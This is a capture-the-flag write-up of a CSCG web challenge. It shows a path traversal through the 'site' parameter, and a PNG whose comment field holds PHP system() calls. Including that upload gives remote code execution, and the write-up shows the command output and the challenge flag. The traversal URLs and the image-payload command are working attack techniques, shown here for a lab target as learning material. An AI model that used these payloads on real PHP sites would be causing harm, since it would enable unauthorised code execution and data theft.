Web - Local Fun Inclusion

  • local file inclusion
  • path traversal in site argument
  • get a list of mounts from /proc/self/mountinfo for identifying where the webserver is mounted to

view-source:http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../proc/self/mountinfo&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png

1007 984 253:0 /opt/local_fun_inclusion/website/src /var/www/site ro,relatime - xfs /dev/mapper/cl_hax1-root rw,seclabel,attr2,inode64,noquota

  • the uploaded files can be included raw here:

http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../var/www/site/uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png

Seems like we can view our images without them being in an image tag, but can we execute code?

well, everything is php, as long as it contains the magic <? portion, so we can insert that with system(\'uname -a'); into a png as seen below:

$ convert black.png -set comment "<? system(‘uname -a’);?>" out.png

this results in the following:

�PNG  IHDR$_�8gAMA���a cHRMz&�����u0�`:�p��Q<bKGD݊� pHYs���+tIME� 1��z-IDAT�c`�@fc� tEXtcommentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux qC�V%tEXtdate:create2020-03-03T10:06:36+00:00�L�A%tEXtdate:modify2020-03-03T10:03:41+00:00�Z�.IEND�B`� 

the png comment extracted:

commentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

As you can see, we've got code execution and know where the websever is, so let's list all files in the webserver

convert black.png -set comment "<? system(\'ls -l /var/www/site/\');?>" out.png
drwxr-xr-x. 2 root     root      168 Mar  2 22:51 css
-rw-r--r--. 1 root     root       57 Mar  2 22:51 flag.php
-rwxr-xr-x. 1 root     root     1813 Mar  2 22:51 index.php
drwxr-xr-x. 2 root     root      108 Mar  2 22:51 js
-rwxr-xr-x. 1 root     root     2802 Mar  2 22:51 upload.php
drwxr-xr-x. 2 www-data www-data  420 Mar  3 10:16 uploads
-rwxr-xr-x. 1 root     root      310 Mar  2 22:51 view.php

Let's read the content of flag.php!

<?php

$FLAG = "CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool}";

...

:::success CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool} :::


http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../var/www/site/uploads/c68271a63ddbc431c307beb7d2918275_1.png&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png